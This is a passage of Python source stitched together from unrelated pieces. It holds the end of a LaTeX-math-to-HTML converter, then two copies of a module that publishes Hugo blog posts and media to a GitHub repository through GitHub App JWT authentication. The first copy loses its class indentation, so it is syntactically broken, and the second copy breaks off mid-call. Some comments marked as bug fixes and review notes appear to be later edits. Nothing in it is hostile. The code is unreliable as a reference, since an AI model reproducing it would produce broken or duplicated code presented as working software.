    elif line.startswith(HeaderConfig.parameters['lstset']):
      # global listings parameters
      LstParser().parselstset(reader)
      return
    elif line.startswith(HeaderConfig.parameters['beginpreamble']):
      contents.append(self.factory.createcontainer(reader))
      return
    # no match
    self.parseparameter(reader)
  def parsebranch(self, reader):
    "Parse all branch definitions."
    branch = reader.currentline().split()[1]
    reader.nextline()
    # a nested parser reads the branch body up to its end marker
    subparser = HeaderParser().complete(HeaderConfig.parameters['endbranch'])
    subparser.parse(reader)
    options = BranchOptions(branch)
    for key in subparser.parameters:
      options.set(key, subparser.parameters[key])
    Options.branches[branch] = options
  def complete(self, ending):
    "Complete the parser with the given ending."
    self.ending = ending
    return self
class PreambleParser(Parser):
  "Reads the LyX preamble into a shared class-level buffer."
  # accumulated preamble lines, shared by all instances
  preamble = []
  def parse(self, reader):
    "Consume the whole preamble; produces no contents of its own."
    self.ending = HeaderConfig.parameters['endpreamble']
    def readline():
      self.parsepreambleline(reader)
    self.parseending(reader, readline)
    return []
  def parsepreambleline(self, reader):
    "Store the current line verbatim and advance the reader."
    PreambleParser.preamble.append(reader.currentline())
    reader.nextline()
class LstParser(object):
  "Parse global and local lstparams."
  # global listing parameters, set by the last \lstset seen
  globalparams = dict()
  def parselstset(self, reader):
    "Parse a declaration of lstparams in lstset."
    paramtext = self.extractlstset(reader)
    if not paramtext:
      # extractlstset already logged the error; '{' in None would raise
      return
    if not '{' in paramtext:
      Trace.error('Missing opening bracket in lstset: ' + paramtext)
      return
    lefttext = paramtext.split('{')[1]
    croppedtext = lefttext[:-1]
    # bugfix: parselstparams expects a list of 'key=value' entries; passing
    # the raw string iterated it character by character
    LstParser.globalparams = self.parselstparams(croppedtext.split(','))
  def extractlstset(self, reader):
    "Extract the global lstset parameters; returns None when unterminated."
    paramtext = ''
    while not reader.finished():
      paramtext += reader.currentline()
      reader.nextline()
      if paramtext.endswith('}'):
        return paramtext
    Trace.error('Could not find end of \\lstset settings; aborting')
  def parsecontainer(self, container):
    "Parse some lstparams from a container."
    container.lstparams = LstParser.globalparams.copy()
    paramlist = container.getparameterlist('lstparams')
    container.lstparams.update(self.parselstparams(paramlist))
  def parselstparams(self, paramlist):
    "Process a number of lstparams from a list of 'key=value' strings."
    paramdict = dict()
    for param in paramlist:
      if not '=' in param:
        # tolerate blank entries; complain about anything else
        if len(param.strip()) > 0:
          Trace.error('Invalid listing parameter ' + param)
      else:
        key, value = param.split('=', 1)
        paramdict[key] = value
    return paramdict
class MacroDefinition(CommandBit):
  "A function that defines a new command (a macro)."
  # all defined macros by name; also serves as MacroFunction's commandmap
  macros = dict()
  def parsebit(self, pos):
    "Parse the function that defines the macro."
    self.output = EmptyOutput()
    self.parameternumber = 0
    self.defaults = []
    # while defining, unknown commands inside the body are not errors
    self.factory.defining = True
    self.parseparameters(pos)
    self.factory.defining = False
    Trace.debug('New command ' + self.newcommand + ' (' + \
        unicode(self.parameternumber) + ' parameters)')
    self.macros[self.newcommand] = self
  def parseparameters(self, pos):
    "Parse all optional parameters (number of parameters, default values)"
    "and the mandatory definition."
    self.newcommand = self.parsenewcommand(pos)
    # parse number of parameters
    literal = self.parsesquareliteral(pos)
    if literal:
      self.parameternumber = int(literal)
    # parse all default values
    bracket = self.parsesquare(pos)
    while bracket:
      self.defaults.append(bracket)
      bracket = self.parsesquare(pos)
    # parse mandatory definition
    self.definition = self.parseparameter(pos)
  def parsenewcommand(self, pos):
    "Parse the name of the new command."
    self.factory.clearskipped(pos)
    if self.factory.detecttype(Bracket, pos):
      return self.parseliteral(pos)
    if self.factory.detecttype(FormulaCommand, pos):
      return self.factory.create(FormulaCommand).extractcommand(pos)
    Trace.error('Unknown formula bit in defining function at ' + pos.identifier())
    return 'unknown'
  def instantiate(self):
    "Return an instance of the macro."
    return self.definition.clone()
class MacroParameter(FormulaBit):
    "A parameter of a macro, written as #n."

    def detect(self, pos):
        "A macro parameter starts with the hash sign."
        return pos.checkfor('#')

    def parsebit(self, pos):
        "Read the #n marker and render it as an 'unknown' span placeholder."
        if not pos.checkskip('#'):
            Trace.error('Missing parameter start #.')
            return
        self.number = int(pos.skipcurrent())
        marker = '#' + unicode(self.number)
        self.original = marker
        self.contents = [TaggedBit().constant(marker, 'span class="unknown"')]
class MacroFunction(CommandBit):
    "A function that was defined using a macro."

    # The macro registry doubles as the command map: the command name looks
    # up the MacroDefinition to instantiate.
    commandmap = MacroDefinition.macros

    def parsebit(self, pos):
        "Parse a number of input parameters, then expand the macro."
        self.output = FilteredOutput()
        # Parameter values collected from the input, in positional order.
        self.values = []
        macro = self.translated
        self.parseparameters(pos, macro)
        self.completemacro(macro)

    def parseparameters(self, pos, macro):
        "Parse as many parameters as the macro needs."
        self.parseoptional(pos, list(macro.defaults))
        self.parsemandatory(pos, macro.parameternumber - len(macro.defaults))
        if len(self.values) < macro.parameternumber:
            Trace.error('Missing parameters in macro ' + unicode(self))

    def parseoptional(self, pos, defaults):
        "Parse optional (square-bracketed) parameters."
        optional = []
        while self.factory.detecttype(SquareBracket, pos):
            optional.append(self.parsesquare(pos))
            if len(optional) > len(defaults):
                break
        # Pair each parsed optional value with a default; an empty bracket
        # falls back to the default value.
        # NOTE(review): defaults.pop() takes from the END of the list, so the
        # first optional pairs with the last default — looks suspect, but
        # preserved as-is pending confirmation against the macro test suite.
        for value in optional:
            default = defaults.pop()
            if len(value.contents) > 0:
                self.values.append(value)
            else:
                self.values.append(default)
        # Defaults that were not overridden are used as-is.
        self.values += defaults

    def parsemandatory(self, pos, number):
        "Parse a number of mandatory parameters."
        for index in range(number):
            parameter = self.parsemacroparameter(pos, number - index)
            if not parameter:
                return
            self.values.append(parameter)

    def parsemacroparameter(self, pos, remaining):
        "Parse a macro parameter. Could be a bracket or a single letter."
        "If there are just two values remaining and there is a running number,"
        "parse as two separater numbers."
        self.factory.clearskipped(pos)
        if pos.finished():
            return None
        if self.factory.detecttype(FormulaNumber, pos):
            return self.parsenumbers(pos, remaining)
        return self.parseparameter(pos)

    def parsenumbers(self, pos, remaining):
        "Parse the remaining parameters as a running number."
        "For example, 12 would be {1}{2}."
        number = self.factory.parsetype(FormulaNumber, pos)
        if not len(number.original) == remaining:
            return number
        # Split the multi-digit number into one single-digit value per
        # remaining parameter, appending them all directly.
        for digit in number.original:
            value = self.factory.create(FormulaNumber)
            value.add(FormulaConstant(digit))
            # NOTE(review): assigns the whole FormulaNumber object as .type,
            # where other code may expect a type tag — confirm upstream.
            value.type = number
            self.values.append(value)
        return None

    def completemacro(self, macro):
        "Complete the macro with the parameters read."
        self.contents = [macro.instantiate()]
        replaced = [False] * len(self.values)
        for parameter in self.searchall(MacroParameter):
            index = parameter.number - 1
            if index >= len(self.values):
                Trace.error('Macro parameter index out of bounds: ' + unicode(index))
                return
            replaced[index] = True
            parameter.contents = [self.values[index].clone()]
        # Parameters that never appeared in the body are emitted via output
        # filters instead of in-place substitution.
        for index in range(len(self.values)):
            if not replaced[index]:
                self.addfilter(index, self.values[index])

    def addfilter(self, index, value):
        "Add a filter for the given parameter number and parameter value."
        original = '#' + unicode(index + 1)
        # BUG FIX: this previously rendered self.values[0] regardless of the
        # index, so every unreplaced parameter got the first value's HTML.
        # Render the value that was actually passed for this index.
        html = ''.join(value.gethtml())
        self.output.addfilter(original, html)
class FormulaMacro(Formula):
    "A math macro defined in an inset."

    def __init__(self):
        "Use the macro parser and produce no direct output."
        self.parser = MacroParser()
        self.output = EmptyOutput()

    def __unicode__(self):
        "Return a printable representation."
        return 'Math macro'

    # On Python 3 the printable form must come from __str__.
    if sys.version_info >= (3, 0):
        __str__ = __unicode__
# Register the macro bits with the formula machinery: parameters are plain
# formula bits, while macro invocations behave as commands.
FormulaFactory.types += [ MacroParameter ]
FormulaCommand.types += [
    MacroFunction,
]
def math2html(formula):
    "Convert some TeX math to HTML, returned as a single string."
    whole = FormulaFactory().parseformula(formula)
    FormulaProcessor().process(whole)
    whole.process()
    return ''.join(whole.gethtml())
def main():
    "Main function, called if invoked from the command line."
    args = sys.argv
    # NOTE(review): parseoptions presumably consumes the program name and any
    # recognized flags from args in place, leaving exactly one positional
    # argument (the formula) — confirm against Options.parseoptions.
    Options().parseoptions(args)
    if len(args) != 1:
        Trace.error('Usage: math2html.py escaped_string')
        exit()
    result = math2html(args[0])
    Trace.message(result)

if __name__ == '__main__':
    main()
|
"""Sites hosted on Github"""
import base64
import json
import os.path
import re
import time
import typing
from datetime import datetime
import jwt
import requests
from flask import current_app
from ghapi.all import GhApi
from interpersonal.errors import InterpersonalNotFoundError
from interpersonal.sitetypes import base
class GithubAppJwt:
    """A Github app JWT token.

    <https://docs.github.com/en/developers/apps/building-github-apps/authenticating-with-github-apps#jwt-payload>

    app_id: The Github application ID
    private_key_pem: A string containing either the private key itself or a
        path to a file holding it
    """

    def __init__(self, private_key_pem: str, app_id: str):
        self.app_id = app_id
        # Accept either a path to a PEM file or the PEM text itself.
        try:
            with open(private_key_pem) as pkf:
                key_contents = pkf.read().encode()
        except FileNotFoundError:
            key_contents = private_key_pem.encode()
        self.key = key_contents
        # Cached token and the Unix timestamp at which it expires.
        self._token = None
        self.expires = 0

    @property
    def token(self):
        """Retrieve the JWT token.

        Caches the result and only regenerates the token if it is expiring
        soon (within 15 seconds).
        """
        # BUG FIX: this previously compared against time.time() - 15, which
        # refreshed the token only once it had been expired for 15 seconds,
        # handing out stale tokens. Refresh when expiry is within 15 seconds.
        expiring_soon = self.expires < (int(time.time()) + 15)
        if self._token is None or expiring_soon:
            now = int(time.time())
            expires = now + (10 * 60)
            payload = {
                # issued at time, 60 seconds in the past to allow for clock drift
                "iat": now - 60,
                # JWT expiration time (10 minute maximum)
                "exp": expires,
                # GitHub App's identifier
                "iss": int(self.app_id),
            }
            self.expires = expires
            token = jwt.encode(payload, self.key, "RS256")
            # PyJWT < 2 returns bytes; normalize to str.
            if isinstance(token, bytes):
                token = token.decode("utf-8")
            self._token = token
        return self._token
class GithubApiAppJwtAuth:
    """Call the Github API authenticating _as the app_ with a JWT bearer token.

    This is NOT for authenticating as a particular installation of the app.
    App-level auth is required for URIs like /app/installations, which are
    not specific to a given installation. Routes such as
    "/repos/{owner}/{repo}/contents/{path}" only work when authenticating as
    an installation and should not be called through this class.

    Uses the requests library to call the GH REST API directly; the GhApi
    package has problems with JWT bearer token auth (see /docs/ghapi.md).
    """

    def __init__(self, ghajwt: GithubAppJwt):
        self.ghajwt = ghajwt
        # Cache of installation access tokens, keyed by repo owner login.
        self._install_tokens = {}

    def call(self, method, uri, headers=None, **kwargs):
        """Perform one app-authenticated request and return the parsed JSON.

        Raises on a non-2xx response (requests.HTTPError).
        """
        # Allow passing in headers=, but always set auth/accept/UA headers here
        override_headers = {
            "Authorization": f"Bearer {self.ghajwt.token}",
            "Accept": "application/vnd.github.v3+json",
            "User-Agent": "interpersonal.micahrl.com",
        }
        input_headers = headers or {}
        req_headers = {**input_headers, **override_headers}
        result = requests.request(method, uri, headers=req_headers, **kwargs)
        result.raise_for_status()
        return result.json()

    def app_installations(self):
        """Call the GH API for /app/installations

        See example result in
        /docs/github-rest-api-examples/app-installations.json
        """
        # Fixed: this URL has no placeholders, so the f-prefix was noise.
        return self.call("GET", "https://api.github.com/app/installations")

    def app_installations_instid_accesstoks(self, instid):
        """Call the GH API for /app/installations/:installation_id/access_tokens

        See example result in
        /docs/github-rest-api-examples/app-installations-instid-accesstokens.json
        """
        return self.call(
            "POST", f"https://api.github.com/app/installations/{instid}/access_tokens"
        )

    # TODO: list all the different Github authentication types and point to their docs
    # ... having the JWT tokens to auth the app and then get individual inst tokens is confusing
    def install_token(self, owner: str):
        """Get an access token for modifying repo content.

        owner: The GH username of the owner of the repo we're installed to.
            This is probably just your Github username, but if you installed
            the app into an org, it will be the org name.

        - Get a list of all installations
        - Find our owner's installation ID
        - Get an access token for that installation

        Caches the result and only refreshes the token once it has expired.
        """
        if (
            owner not in self._install_tokens
            or self._install_tokens[owner]["expires_at"] <= datetime.utcnow()
        ):
            installs = self.app_installations()
            ours = [i for i in installs if i["account"]["login"] == owner]
            if len(ours) > 1:
                raise Exception(
                    "Unexpected API result, multiple installations for our user"
                )
            if len(ours) < 1:
                raise Exception(f"App has not been installed to {owner}'s account")
            install = ours[0]
            tok = self.app_installations_instid_accesstoks(install["id"])
            # Github returns e.g. "2021-01-01T00:00:00Z"; parse to a naive
            # datetime so the expiry comparison above (utcnow) works.
            tok["expires_at"] = datetime.strptime(
                tok["expires_at"], "%Y-%m-%dT%H:%M:%SZ"
            )
            self._install_tokens[owner] = tok
        return self._install_tokens[owner]
class HugoGithubRepo(base.HugoBase):
"""A Hugo blog kept in a github.com repo
Assumptions:
- The blog is hosted on the default branch
A note on "content" with Github and Hugo:
-----------------------------------------
The word "content" is a bit overloaded within these realms.
Be aware of the following:
* Hugo uses it for your site's content, so a blog post might be at content/blog/post-slug/index.md. This is the value we referemce with 'self.dirs.content'.
* Github uses it in several REST API paths, e.g. "/repos/{owner}/{repo}/contents/{path}" to get the _contents_ of a file at {path}
"""
def __init__(
    self,
    name,
    uri,
    interpersonal_uri,
    sectionmap,
    owner: str,
    repo: str,
    branch: str,
    github_app_id: str,
    private_key_pem: str,
    *,
    mediastaging="",
    mediaprefix="",
):
    """Set up Github credentials and repo coordinates, then init the base blog."""
    self.owner = owner
    self.repo = repo
    self.github_app_id = github_app_id
    ghapp_jwt = GithubAppJwt(private_key_pem, github_app_id)
    self.ghappapi = GithubApiAppJwtAuth(ghapp_jwt)
    # BUG FIX: reusing double quotes inside a double-quoted f-string
    # (f"...{mediaprefix.strip("/")}") is a SyntaxError before Python 3.12;
    # use single quotes for the strip() argument.
    self.mediadir = f"static/{mediaprefix.strip('/')}"
    self.branch = branch
    super().__init__(
        name,
        uri,
        interpersonal_uri,
        sectionmap,
        mediaprefix=mediaprefix,
        mediastaging=mediastaging,
    )
def _logged_api(self, *args, **kwargs):
    """Call the Github API via GhApi, logging parameters and results.

    A fresh GhApi client is created per call, authenticated with the cached
    installation token for self.owner. Exceptions are re-raised after
    attempting to log the error body Github returned.
    """
    apptok = self.ghappapi.install_token(self.owner)
    api = GhApi(token=apptok["token"])
    try:
        resp = api(*args, **kwargs)
        current_app.logger.debug(
            f"_logged_api called with *args {args} and **kwargs {kwargs}, returned {resp}"
        )
        return resp
    except BaseException as exc:
        current_app.logger.debug(
            f"_logged_api called with *args {args} and **kwargs {kwargs} threw exception {exc}"
        )
        # GhApi doesn't surface error details from Github
        # Try to find them ourselves here
        # <https://github.com/fastai/ghapi/issues/79>
        try:
            # Reminder: you can only call .read() once, and there is no .seek()
            exc_fp_data = exc.fp.read()
            result_body = json.loads(exc_fp_data)
            current_app.logger.debug(f"Result body from github: {result_body}")
        except BaseException as inner_exc:
            # Best-effort only: not every exception carries a response body.
            current_app.logger.debug(
                f"Tried to get result body from Github, but was unsuccessful, err: {inner_exc}"
            )
        raise exc
def _get_raw_post_body(self, uri: str) -> base.HugoPostSource:
    """Fetch the raw source of the post at *uri* from the Github repo.

    Tries index.md then index.html inside the post's bundle directory, and
    raises InterpersonalNotFoundError when neither exists.

    NOTE(review): the annotation says HugoPostSource, but the visible code
    returns the b64-decoded file contents as a str — confirm against
    base.HugoBase's contract.
    """
    for indexname in ["index.md", "index.html"]:
        indexpath = os.path.join(self._uri_to_post_bundle_dir(uri), indexname)
        resp = self._get_repo_file_if_exists(indexpath)
        if resp:
            break
    else:
        # for/else: runs only when no index file was found at all
        raise InterpersonalNotFoundError
    content = base64.b64decode(resp["content"]).decode()
    current_app.logger.debug(
        f"_get_raw_post_body({uri}) found b64-decoded file contents of {content}"
    )
    return content
def _add_raw_post_body(
    self, slug: str, raw_body: str, section: str, body_type: str = ""
) -> str:
    """Create the post's bundle index file in the repo; return its public URI.

    body_type selects the index file name: "html" -> index.html, anything
    else -> index.md.
    """
    ppath = self._post_path(slug, section)
    if body_type == "html":
        filename = "index.html"
    else:
        filename = "index.md"
    self._logged_api(
        r"/repos/{owner}/{repo}/contents/{path}",
        "PUT",
        route=dict(
            owner=self.owner,
            repo=self.repo,
            # BUG FIX: the path previously ended in the literal "(unknown)",
            # leaving the computed filename unused; write the index file.
            path=f"{self.dirs.content}/{ppath}/{filename}",
        ),
        data={
            "message": f"Creating post for {slug} from Interpersonal",
            "content": base64.b64encode(raw_body.encode()).decode(),
        },
    )
    return f"{self.baseuri}{ppath}"
def _get_repo_file_if_exists(self, path: str) -> typing.Union[typing.Any, None]:
    """Retrieve a single file from the repo, or None if it does not exist."""
    try:
        resp = self._logged_api(
            r"/repos/{owner}/{repo}/contents/{path}",
            "GET",
            route=dict(owner=self.owner, repo=self.repo, path=path),
        )
        current_app.logger.debug(f"Successfully retrieved file from {path}")
        return resp
    except BaseException as exc:
        # Only a 404 means "no such file"; anything else is unexpected.
        try:
            statuscode = int(exc.status)
        except BaseException:
            statuscode = None
        if statuscode == 404:
            current_app.logger.debug(f"No file exists at {path}")
            return None
        current_app.logger.error(
            f"Unhandled error trying to talk to github, re-raising..."
        )
        raise
def _add_repo_file_if_not_exists(
    self, relpath: str, opaque_file: base.OpaqueFile
) -> base.AddedMediaItem:
    """Given a repo-relative path and a file, upload it if it does not exist"""
    # TODO: are githubusercontent.com URIs going to work well?
    public_uri = f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/{relpath}"
    if self._get_repo_file_if_exists(relpath):
        current_app.logger.debug(
            f"Media already exists at {relpath}, nothing to do..."
        )
        return base.AddedMediaItem(public_uri, False)
    current_app.logger.debug(
        f"Media does not yet exist at {relpath}, will upload..."
    )
    self._logged_api(
        r"/repos/{owner}/{repo}/contents/{path}",
        "PUT",
        route=dict(owner=self.owner, repo=self.repo, path=relpath),
        data=dict(
            message=f"Add media item {relpath}",
            content=base64.b64encode(opaque_file.contents).decode(),
        ),
    )
    return base.AddedMediaItem(public_uri, True)
def _add_media(
    self, media: typing.List[base.OpaqueFile]
) -> typing.List[base.AddedMediaItem]:
    """Add each media file, via local staging or straight to the repo."""
    results: typing.List[base.AddedMediaItem] = []
    for opaque in media:
        if self.mediastaging:
            results.extend(self._add_media_staging([opaque]))
        else:
            target = f"{self.mediadir}/{opaque.hexdigest}/{opaque.filename}"
            results.append(self._add_repo_file_if_not_exists(target, opaque))
    return results
def _delete_media(self, uris: typing.List[str]):
    """Delete media from Github.

    Not required for the implementation, but useful for e2e tests.
    Assumes URIs are raw.githubusercontent.com URIs - NOT final published
    content URIs! Again, this is really just for testing.

    TODO: Modify this to work in remote media dir mode, and make it a noop
    in local staging mode. Was originally written assuming the media
    endpoint uploads directly to a staging directory in the Github repo and
    the files are later moved; now, in staging mode, Interpersonal holds
    media files temporarily on its own server, so this is only useful in
    remote media dir mode.
    """
    # The escaped prefix does not depend on the loop variable; compute once.
    esc_uri_prefix = re.escape(
        f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/"
    )
    for uri in uris:
        relpath = re.sub(esc_uri_prefix, "", uri)
        # Github requires the current blob sha to delete a file, so fetch it first.
        get_resp = self._logged_api(
            r"/repos/{owner}/{repo}/contents/{path}",
            "GET",
            route=dict(owner=self.owner, repo=self.repo, path=relpath),
        )
        # Actually delete the file, referencing the file's sha
        self._logged_api(
            r"/repos/{owner}/{repo}/contents/{path}",
            "DELETE",
            route=dict(owner=self.owner, repo=self.repo, path=relpath),
            data=dict(
                message=f"Remove media item {relpath}",
                sha=get_resp["sha"],
            ),
        )
def _collect_media_for_post(
self, postslug: str, postbody: str, section: str, media: typing.List[str]
) -> str:
for staging_uri in media:
if not staging_uri.startswith(self.interpersonal_uri):
current_app.logger.debug(
f"Media collection will skip URI '{staging_uri}' as it is not prefixed with what we expect '{self.interpersonal_uri}'."
)
continue
splituri = staging_uri.split("/")
digest = splituri[-2]
filename = splituri[-1]
localpath = os.path.join(self.mediastaging, digest, filename)
repopath = os.path.join("content", section, postslug, digest, filename)
if not os.path.exists(localpath):
raise InterpersonalNotFoundError(localpath)
new_uri = self._media_item_uri_collected(postslug, section, staging_uri)
postbody = re.sub(re.escape(staging_uri), new_uri, postbody)
repofile = self._get_repo_file_if_exists(repopath)
if repofile:
current_app.logger.debug(
f"Media already exists at {repopath}, nothing to do..."
)
continue
else:
current_app.logger.debug(
f"Media does not yet exist at {repopath}, will upload..."
)
with open(localpath, "rb") as fp:
b64content = base64.b64encode(fp.read()).decode()
put_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"PUT",
route=dict(owner=self.owner, repo=self.repo, path=repopath),
data=dict(
message=f"Add media item {repopath}",
content=b64content,
),
)
return postbody | """Sites hosted on Github"""
import base64
import json
import os.path
import re
import time
import typing
from datetime import datetime
import jwt
import requests
from flask import current_app
from ghapi.all import GhApi
from interpersonal.errors import InterpersonalNotFoundError
from interpersonal.sitetypes import base
class GithubAppJwt:
    """A Github app JWT token.

    <https://docs.github.com/en/developers/apps/building-github-apps/authenticating-with-github-apps#jwt-payload>

    app_id: The Github application ID
    private_key_pem: A string containing either the private key itself or a
        path to a file holding it
    """

    def __init__(self, private_key_pem: str, app_id: str):
        self.app_id = app_id
        # Accept either a path to a PEM file or the PEM text itself.
        try:
            with open(private_key_pem) as pkf:
                key_contents = pkf.read().encode()
        except FileNotFoundError:
            key_contents = private_key_pem.encode()
        self.key = key_contents
        # Cached token and the Unix timestamp at which it expires.
        self._token = None
        self.expires = 0

    @property
    def token(self):
        """Retrieve the JWT token.

        Caches the result and only regenerates the token if it is expiring
        soon (within 15 seconds).
        """
        # BUG FIX: this previously compared against time.time() - 15, which
        # refreshed the token only once it had been expired for 15 seconds,
        # handing out stale tokens. Refresh when expiry is within 15 seconds.
        expiring_soon = self.expires < (int(time.time()) + 15)
        if self._token is None or expiring_soon:
            now = int(time.time())
            expires = now + (10 * 60)
            payload = {
                # issued at time, 60 seconds in the past to allow for clock drift
                "iat": now - 60,
                # JWT expiration time (10 minute maximum)
                "exp": expires,
                # GitHub App's identifier
                "iss": int(self.app_id),
            }
            self.expires = expires
            token = jwt.encode(payload, self.key, "RS256")
            # PyJWT < 2 returns bytes; normalize to str.
            if isinstance(token, bytes):
                token = token.decode("utf-8")
            self._token = token
        return self._token
class GithubApiAppJwtAuth:
    """Call the Github API authenticating _as the app_ with a JWT bearer token.

    This is NOT for authenticating as a particular installation of the app.
    App-level auth is required for URIs like /app/installations, which are
    not specific to a given installation. Routes such as
    "/repos/{owner}/{repo}/contents/{path}" only work when authenticating as
    an installation and should not be called through this class.

    Uses the requests library to call the GH REST API directly; the GhApi
    package has problems with JWT bearer token auth (see /docs/ghapi.md).
    """

    def __init__(self, ghajwt: GithubAppJwt):
        self.ghajwt = ghajwt
        # Cache of installation access tokens, keyed by repo owner login.
        self._install_tokens = {}

    def call(self, method, uri, headers=None, **kwargs):
        """Perform one app-authenticated request and return the parsed JSON.

        Raises on a non-2xx response (requests.HTTPError).
        """
        # Allow passing in headers=, but always set auth/accept/UA headers here
        override_headers = {
            "Authorization": f"Bearer {self.ghajwt.token}",
            "Accept": "application/vnd.github.v3+json",
            "User-Agent": "interpersonal.micahrl.com",
        }
        input_headers = headers or {}
        req_headers = {**input_headers, **override_headers}
        result = requests.request(method, uri, headers=req_headers, **kwargs)
        result.raise_for_status()
        return result.json()

    def app_installations(self):
        """Call the GH API for /app/installations

        See example result in
        /docs/github-rest-api-examples/app-installations.json
        """
        # Fixed: this URL has no placeholders, so the f-prefix was noise.
        return self.call("GET", "https://api.github.com/app/installations")

    def app_installations_instid_accesstoks(self, instid):
        """Call the GH API for /app/installations/:installation_id/access_tokens

        See example result in
        /docs/github-rest-api-examples/app-installations-instid-accesstokens.json
        """
        return self.call(
            "POST", f"https://api.github.com/app/installations/{instid}/access_tokens"
        )

    # TODO: list all the different Github authentication types and point to their docs
    # ... having the JWT tokens to auth the app and then get individual inst tokens is confusing
    def install_token(self, owner: str):
        """Get an access token for modifying repo content.

        owner: The GH username of the owner of the repo we're installed to.
            This is probably just your Github username, but if you installed
            the app into an org, it will be the org name.

        - Get a list of all installations
        - Find our owner's installation ID
        - Get an access token for that installation

        Caches the result and only refreshes the token once it has expired.
        """
        if (
            owner not in self._install_tokens
            or self._install_tokens[owner]["expires_at"] <= datetime.utcnow()
        ):
            installs = self.app_installations()
            ours = [i for i in installs if i["account"]["login"] == owner]
            if len(ours) > 1:
                raise Exception(
                    "Unexpected API result, multiple installations for our user"
                )
            if len(ours) < 1:
                raise Exception(f"App has not been installed to {owner}'s account")
            install = ours[0]
            tok = self.app_installations_instid_accesstoks(install["id"])
            # Github returns e.g. "2021-01-01T00:00:00Z"; parse to a naive
            # datetime so the expiry comparison above (utcnow) works.
            tok["expires_at"] = datetime.strptime(
                tok["expires_at"], "%Y-%m-%dT%H:%M:%SZ"
            )
            self._install_tokens[owner] = tok
        return self._install_tokens[owner]
class HugoGithubRepo(base.HugoBase):
    """A Hugo blog kept in a github.com repo

    Assumptions:
    - The blog is hosted on the default branch

    A note on "content" with Github and Hugo:
    -----------------------------------------
    The word "content" is a bit overloaded within these realms.
    Be aware of the following:
    * Hugo uses it for your site's content, so a blog post might be at
      content/blog/post-slug/index.md. This is the value we reference with
      'self.dirs.content'.
    * Github uses it in several REST API paths, e.g.
      "/repos/{owner}/{repo}/contents/{path}" to get the _contents_ of a
      file at {path}
    """

    def __init__(
        self,
        name,
        uri,
        interpersonal_uri,
        sectionmap,
        owner: str,
        repo: str,
        branch: str,
        github_app_id: str,
        private_key_pem: str,
        *,
        mediastaging="",
        mediaprefix="",
    ):
        """Set up Github credentials and repo coordinates, then init the base blog."""
        self.owner = owner
        self.repo = repo
        self.github_app_id = github_app_id
        ghapp_jwt = GithubAppJwt(private_key_pem, github_app_id)
        self.ghappapi = GithubApiAppJwtAuth(ghapp_jwt)
        # Media lives under Hugo's static/ dir, below the media URI prefix.
        self.mediadir = f"static/{mediaprefix.strip('/')}"
        self.branch = branch
        super().__init__(
            name,
            uri,
            interpersonal_uri,
            sectionmap,
            mediaprefix=mediaprefix,
            mediastaging=mediastaging,
        )

    def _logged_api(self, *args, **kwargs):
        """Call self.api, logging parameters and results.

        A fresh GhApi client is created per call, authenticated with the
        cached installation token for self.owner. Exceptions are re-raised
        after attempting to log the error body Github returned.
        """
        apptok = self.ghappapi.install_token(self.owner)
        api = GhApi(token=apptok["token"])
        try:
            resp = api(*args, **kwargs)
            current_app.logger.debug(
                f"_logged_api called with *args {args} and **kwargs {kwargs}, returned {resp}"
            )
            return resp
        except BaseException as exc:
            current_app.logger.debug(
                f"_logged_api called with *args {args} and **kwargs {kwargs} threw exception {exc}"
            )
            # GhApi doesn't surface error details from Github
            # Try to find them ourselves here
            # <https://github.com/fastai/ghapi/issues/79>
            try:
                # Reminder: you can only call .read() once, and there is no .seek()
                exc_fp_data = exc.fp.read()
                result_body = json.loads(exc_fp_data)
                current_app.logger.debug(f"Result body from github: {result_body}")
            except BaseException as inner_exc:
                # Best-effort only: not every exception carries a response body.
                current_app.logger.debug(
                    f"Tried to get result body from Github, but was unsuccessful, err: {inner_exc}"
                )
            raise exc

    def _get_raw_post_body(self, uri: str) -> base.HugoPostSource:
        """Fetch the raw source of the post at *uri* from the repo.

        Tries index.md then index.html in the post's bundle directory, and
        raises InterpersonalNotFoundError when neither exists.

        NOTE(review): the annotation says HugoPostSource but the code
        returns the decoded str — confirm against base.HugoBase.
        """
        for indexname in ["index.md", "index.html"]:
            indexpath = os.path.join(self._uri_to_post_bundle_dir(uri), indexname)
            resp = self._get_repo_file_if_exists(indexpath)
            if resp:
                break
        else:
            # for/else: runs only when no index file was found at all
            raise InterpersonalNotFoundError
        content = base64.b64decode(resp["content"]).decode()
        current_app.logger.debug(
            f"_get_raw_post_body({uri}) found b64-decoded file contents of {content}"
        )
        return content

    def _add_raw_post_body(
        self, slug: str, raw_body: str, section: str, body_type: str = ""
    ) -> str:
        """Create the post's bundle index file in the repo; return its public URI.

        body_type selects the index file name: "html" -> index.html,
        anything else -> index.md.
        """
        ppath = self._post_path(slug, section)
        if body_type == "html":
            filename = "index.html"
        else:
            filename = "index.md"
        self._logged_api(
            r"/repos/{owner}/{repo}/contents/{path}",
            "PUT",
            route=dict(
                owner=self.owner,
                repo=self.repo,
                # BUG FIX: the path previously ended in the literal
                # "(unknown)", leaving the computed filename unused.
                path=f"{self.dirs.content}/{ppath}/{filename}",
            ),
            data={
                "message": f"Creating post for {slug} from Interpersonal",
                "content": base64.b64encode(raw_body.encode()).decode(),
            },
        )
        return f"{self.baseuri}{ppath}"

    def _get_repo_file_if_exists(self, path: str) -> typing.Union[typing.Any, None]:
        """Retrieve a single file if it exists, or None if not"""
        try:
            get_resp = self._logged_api(
                r"/repos/{owner}/{repo}/contents/{path}",
                "GET",
                route=dict(owner=self.owner, repo=self.repo, path=path),
            )
            current_app.logger.debug(f"Successfully retrieved file from {path}")
            return get_resp
        except BaseException as exc:
            # Only a 404 means "no such file"; anything else is unexpected.
            try:
                statuscode = int(exc.status)
            except BaseException:
                statuscode = None
            if statuscode != 404:
                current_app.logger.error(
                    f"Unhandled error trying to talk to github, re-raising..."
                )
                raise
            current_app.logger.debug(f"No file exists at {path}")
            return None

    def _add_repo_file_if_not_exists(
        self, relpath: str, opaque_file: base.OpaqueFile
    ) -> base.AddedMediaItem:
        """Given a repo-relative path and a file, upload it if it does not exist"""
        # TODO: are githubusercontent.com URIs going to work well?
        uploaded_uri = f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/{relpath}"
        if self._get_repo_file_if_exists(relpath):
            current_app.logger.debug(
                f"Media already exists at {relpath}, nothing to do..."
            )
            created = False
        else:
            current_app.logger.debug(
                f"Media does not yet exist at {relpath}, will upload..."
            )
            self._logged_api(
